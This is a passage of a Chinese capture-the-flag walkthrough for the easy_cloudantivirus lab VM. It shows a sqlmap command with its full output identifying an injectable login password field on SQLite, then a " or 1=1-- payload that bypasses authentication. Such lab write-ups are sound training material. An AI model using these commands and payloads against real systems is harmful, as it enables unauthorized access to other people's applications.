- 首页 > 生活 > >
靶机: easy_cloudantivirus( 二 )
表单提交指向 /login 网页,我们可以大致推理出,这个表单提交的数据是用于登录此处可以尝试进行注入测试在网站这发现网页内容中查找可能的注入点,我们可以使用 sqlmap 进行测试
- 新建一个文件 target.txt
- 使用 Kali 的 Firefox-ESR 在页面
http://192.168.56.109:8080/ 使用 Ctrl + Shift + I 打开 Web 开发者工具 - Web 开发者工具中的网络工具对页面
http://192.168.56.109:8080/login 设置拦截 - 在页面
http://192.168.56.109:8080/ 发送上面表单的 POST 请求 - 复制拦截的该请求的请求头和请求数据到 target.txt 文件中
- 使用命令
sqlmap -r target.txt -f --level 4 --risk 3
┌──(kali?kali)-[~/workspace]└─$ sqlmap -r testsql.txt -f --level 4 --risk 3_____H_____ ___[']_____ ___ ___{1.6.10#stable}|_ -| . [(]| .'| . ||___|_[(]_|_|_|__,|_||_|V...|_|https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 15:18:43 /2022-10-23/[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'[15:18:43] [INFO] testing connection to the target URL[15:18:44] [INFO] testing if the target URL content is stable[15:18:44] [INFO] target URL content is stable[15:18:44] [INFO] testing if POST parameter 'password' is dynamic[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Yfor the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y[15:19:14] [INFO] testing 'Generic inline queries'[15:19:14] [INFO] testing 'SQLite inline queries'[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found- 从中可以看出存在注入点,并且 DBMS 可能是 SQLite
- 并且从
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable 可以看出注入类型 OR boolean-based
构造 SQL 注入语句,已知注入类型 OR boolean-based 可以尝试比较通用的语句 " or 1=1--做为页面 http://192.168.56.109:8080/ 中表单的 password 值进行提交表单
到目前为止,我们成功登录
http://192.168.56.109:8080/scan
经验总结扩展阅读
-
事业单位高温补贴多少钱 事业单位高温补贴发放是每年都有吗
-
-
-
-
-
-
-
28岁女白领:靠出轨38岁领导走向事业顶峰,我却过得很煎熬
-
-
卡西欧手表哪一款性价比高,卡西欧系列的手表都有哪些好的推荐?
-
-
-
久久说情感 凤凰男要求AA制,多年后却向妻子求助,妻子回应:我有钱,但不帮
-
-
-
-
连衣裙 炎热的夏天,穿一件短款修身连衣裙游逛商厦绝对是最惬意的事情!
-
-
-
